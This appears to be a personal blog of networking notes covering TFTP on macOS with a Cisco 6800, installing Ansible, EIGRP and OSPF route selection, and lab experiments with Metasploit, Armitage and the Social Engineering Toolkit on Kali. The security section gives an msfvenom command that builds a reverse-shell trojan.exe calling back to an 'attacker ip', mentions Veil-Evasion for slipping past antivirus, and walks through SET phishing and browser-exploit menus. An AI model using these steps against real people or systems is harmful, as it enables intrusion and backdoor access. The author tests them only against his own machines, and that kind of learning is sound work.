Configure OS x as tftp server and download from vrf enabled 6800 chassis

Below is the steps that I used to download files from vrf enabled 6800 chassis to my mac laptop:

1, Enable tftp server in OS x:

sudo launchctl load -F /System/Library/LaunchDaemons/tftp.plist
sudo launchctl start

By default use private/tftpboot/ filefolder for tftp download and upload:

sudo chmod 777 /private/tftpboot
sudo chmod 777 /private/tftpboot/*

2, setup tftp route in 6800

I want to download/upload from/to mgmt port, mgmt port belongs to a separated management vrf. In order to make tftp server IP routed correctly, we need add the following configuration into the chassis:

cat6k#ip tftp source-interface mgmt0

3, Now it is ready for tftp download/upload to OS x from/to vrf enabled Chassis.

cat6k#copy running-config tftp://172.27.x.x

Address or name of remote host [172.27.x.x]?

Destination filename [xxx-confg]? running-config


85918 bytes copied in 1.084 secs (79260 bytes/sec)


Install ansible in mac os

Ansible is mainly used for automize Linux/windows servers provisioning and operation, however from version 2.1 there is support module for network related devices.

In order to test it I have first install ansible in my mac:

There are several ways to install ansible, but the mostly common used on mac is homebrew an pip. Here is the comparision of both installation ways:

"pip is a packager for the python world – you should only ever be able to install python-things with it; homebrew is a package manager targetted at OSX; it doesn’t impose any restrictions onto what software you can install with it – since python is a subset of software.

installing things with brew will install them into /usr/local/;

installing things with pip will fetch packages from the Python Package Index, and it will install them in a place where your python interpreter will find them: either into your home directory (e.g. ~/.local/lib/python2.7/site-packages/) or in some global search-path of your python interpreter (e.g. /usr/local/lib/python2.7/dist-packages/)”

We will just explore the way to install ansible with homebrew:

1, install Xcode (C compiler) in order to use python
xcode-select –install

2, Install python using homebrew

brew install python


brew install python3

Actually, step 1 and 2 can be skipped because all new Mac OS X has python 2.7 installed already.

3, brew install ansible

After the installation we can find ansible is installed under /usr/local/bin/

mac-c02t6npagtfj:bin grayin$ ls ansible*

ansible ansible-doc ansible-pull

ansible-config ansible-galaxy ansible-vault

ansible-connection ansible-inventory

ansible-console ansible-playbook

notes: do “brew update” first before the installation to avoid any unexpected errors

How to influence EIGRP metrics to affect route selection

EIGRP updates contain five metrics: minimum bandwidth, delay, load, reliability, and maximum transmission unit (MTU). Of these five metrics, by default, only minimum bandwidth and delay are used to compute best path. Unlike most metrics, minimum bandwidth is set to the minimum bandwidth of the entire path, and it does not reflect how many hops or low bandwidth links are in the path. Delay is a cumulative value which increases by the delay value of each segment in the path.

Therefore we can change delay on interface to affect route selection, but this method can only be used when need to influence route selection learned via EIGRP neighbor on that interface.

Another more sophisticated way is to use offset-list, the metric of the route on the router can be modified using an offset-list on the neighbor router. Offset-list will insert the value to affect RD and FD advertised towards the peer router.

OSPF loadbalance

4 is the default number of routes that OSPF will include in routing table if more than 4 equal cost routes exist for the same subnet. However, OSPF can include up to 16  equal cost routes in the routing table and  perform load balancing amongst them. In order to configure this feature, you need to use the  OSPF subcommand maximum-paths, i.e. maximum-paths 16.

OSPF uses Link cost as a metric not hop count.

etwork Type Cost
FDDI/Fast Ethernet 1
Token Ring (16Mbps) 6
Ethernet 10
E1 48
T1 64
64 kb/s 1562
56 kb/s 1785

Maximum paths EIGRP defaults to 4 paths for load balancing but the maximum that can be set is 16.

When multiple routes are installed in the routing table, Cisco switch will depends on CEF to pick the route. By default CEF will use src-dst IP pair to select route path, however there might be CEF polarization problem.


Metasploit & Armitage

Armitage is a GUI based Metasploit, it save your time to remember all cli commands in metasploit and visualize scanning results.  Both of the tools are available in kalilinux. If you can use one of them, then you can use the other automaticly.

I tried both, below is the guide to discover all online machine in a subnet by using armigate:

1,  Hosts tab-> clear database

This is to prepare a clean environment for new discovery

2,  Hosts->nmap scan -> quick scan (detect OS) -> input subnet IP for scaning

This will take a couple of minutes to complete depending on how big the subnet is. This step can be finished by using pure nmap command under cli.

After this step, you should be able to see the operation system running on each machine, however it can not recognize windows 10.  By using nmap we would check the way of detecting OS. In short nmap will scan some special ports of the victim and see if those ports are open, especially 139 and 445. If these ports are open, nmap can very likly use them to detecting OS of the victim, more details here.

“One of Nmap’s best-known features is remote OS detection using TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines practically every bit in the responses. After performing dozens of tests such as TCP ISN sampling, TCP options support and ordering, IP ID sampling, and the initial window size check, Nmap compares the results to itsnmap-os-db database of more than 2,600 known OS fingerprints and prints out the OS details if there is a match. Each fingerprint includes a freeform textual description of the OS, and a classification which provides the vendor name (e.g. Sun), underlying OS (e.g. Solaris), OS generation (e.g. 10), and device type (general purpose, router, switch, game console, etc). Most fingerprints also have a Common Platform Enumeration (CPE) representation, like cpe:/o:linux:linux_kernel:2.6.”

When trying to scan window 10 machine, we can see the message something like ” all ports are filtered”. Below is an example of scanning windows 10 machine:

root@kali:/# nmap -O

Starting Nmap 7.40 ( ) at 2017-10-05 04:58 EDT
Nmap scan report for juhao.lan (
Host is up (0.014s latency).
All 1000 scanned ports on juhao.lan ( are filtered
MAC Address: AC:D1:B8:E4:3F:E7 (Hon Hai Precision Ind.)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 24.20 seconds

3, When scanning is completed, all online machine will be listed as icons in the workspace.  we can do attacks -> find attacks to find all possible attacks towards each machines. we can also do attacks -> Hail Mary  to launch massive attacks towards target machines.

Unfortunately I tried Hail Mary towards my windows 7 and window 8.1, no one get compromised. Again it looks like all those attacks in metasploit are already well-known, and can not be a serious threat in the real world.

In order to implement a successful attack, we can also utilize payload in metasploit. I tested that classic payload windows/meterpreter/reverse_tcp

Here is the guide regarding how to generate a vicious .exe code, in short:

# msfvenom -p windows/meterpreter/reverse_tcp  –platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=4444 -o /root/Desktop/trojan.exe

Msfvenom is a tool used to generated vicious code for metasploit payload. The code need to be transfered to target machines and runned there in order to create a backdoor towards attackers machine.

The real challenge is actually to send this .exe code to victim machine. I am using my own machine for test but can not even load the code into my machine. I tried by sending myself email, but the email attachment is blocked because google has detected malicious malware in the attachment. I tried to copy the file into USB, but as long as I insert USB into my test machine the malware is removed by windows defender. The author recommended to use some encoder, for example Veil-Evasion to disguise .exe file, need find time to try this.




Social Engineering Toolkit

Tried these tools under kali linux, below are some notes:


Kalilinux image: Kali Linux 64 bit VMware VM, can be downloaded here

VMWARE fusion: 8.5.8

Social Engineering Toolkit

To start up, type:

root@kali:/# setoolkit

main menu is displayed as below:

Select from the menu:

1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

tried 1, go to submenu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules

There are a lot of material regarding SET online, I just did very basic lab for item 2, tried 1 also but without success.

item 1 ->Perform a Mass Email Attack ->15)Custom EXE to VBA (sent via RAR) (RAR required) -> 2) Windows Meterpreter Reverse_TCP

After input LHOST and PORT, I got the following error:

IP address for the payload listener (LHOST):
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443…
[*] All good! The directories were created.
[-] Generating fileformat exploit…

[!] Something went wrong, printing the error: name ‘a’ is not defined

item 2) Website Attack Vectors ->

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method

99) Return to Main Menu


The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: n
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address)
set:webattack> IP address or hostname for the reverse connection:

1. Java Required
2. Google
3. Facebook
4. Twitter
5. Yahoo

set:webattack> Select a template:1

Enter the browser exploit you would like to use [8]:

1) Adobe Flash Player ByteArray Use After Free (2015-07-06)
2) Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
3) Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
4) MS14-012 Microsoft Internet Explorer TextRange Use-After-Free (2014-03-11)
5) MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free (2014-02-13)
6) Internet Explorer CDisplayPointer Use-After-Free (10/13/2013)
7) Micorosft Internet Explorer SetMouseCapture Use-After-Free (09/17/2013)
8) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)
9) Java Applet JMX Remote Code Execution (2013-01-10)
10) MS13-009 Microsoft Internet Explorer SLayoutRun Use-AFter-Free (2013-02-13)
11) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
12) Java 7 Applet Remote Code Execution (2012-08-26)
13) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
14) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
15) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
16) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
17) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
18) Adobe Flash Player Object Type Confusion (2012-05-04)
19) Adobe Flash Player MP4 “cprt” Overflow (2012-02-15)
20) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
21) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
22) MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
23) Adobe Flash Player SWF Memory Corruption Vulnerability (2011-04-11)
24) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
25) Internet Explorer CSS Import Use After Free (2010-11-29)
26) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
27) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
28) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
29) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
30) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
31) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
32) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
33) Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow (2010-09-07)
34) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
35) Microsoft Help Center XSS and Command Execution (2010-06-09)
36) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
37) Microsoft Internet Explorer “Aurora” Memory Corruption (2010-01-14)
38) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
39) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
40) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
41) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
42) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
43) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
44) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
45) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
46) Metasploit Browser Autopwn (USE AT OWN RISK!)


1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
6) Windows Meterpreter Egress Buster Spawn a meterpreter shell and

By doing this,  kalilinux will build a webserver listening port 8080 by default. What left  is to convince a victim to visit this website. As long as website link is clicked, I can see massive java applets was attempted to be inserted into victim’s machine, and tried to open session towards kalilinux machine. This is the basic example for attack by seducing victim clicking on a vicious link.

Once attack is successful,  in theory I will see active sesssions from Kalilinx by typeing “sessions”

Windows Reverse_TCP Meterpreter is a well-knows way to build a backdoor session with the victim machine. This is the option that have been regarded as high possibility for successful attack. However unfortunately this is no longer the case.  It might be a useful attack towards windows xp when no firewall or defender activated.  When I tried with a victim running windows 8.1 and updated windows defender, Windows defender jumped out and remove the malware immediately, and I got no active session towards victim from my Kalilinux. Especially, we I use chrome or firefox, I can feel that the attempt was protected even by the browsers.

SET is a great tool for learning concepts and ideas for attacking, but very likely that all modules and tools available in SET is not useful to attack in real business world where servers, fws, IDS and other system are fully patched and well protected.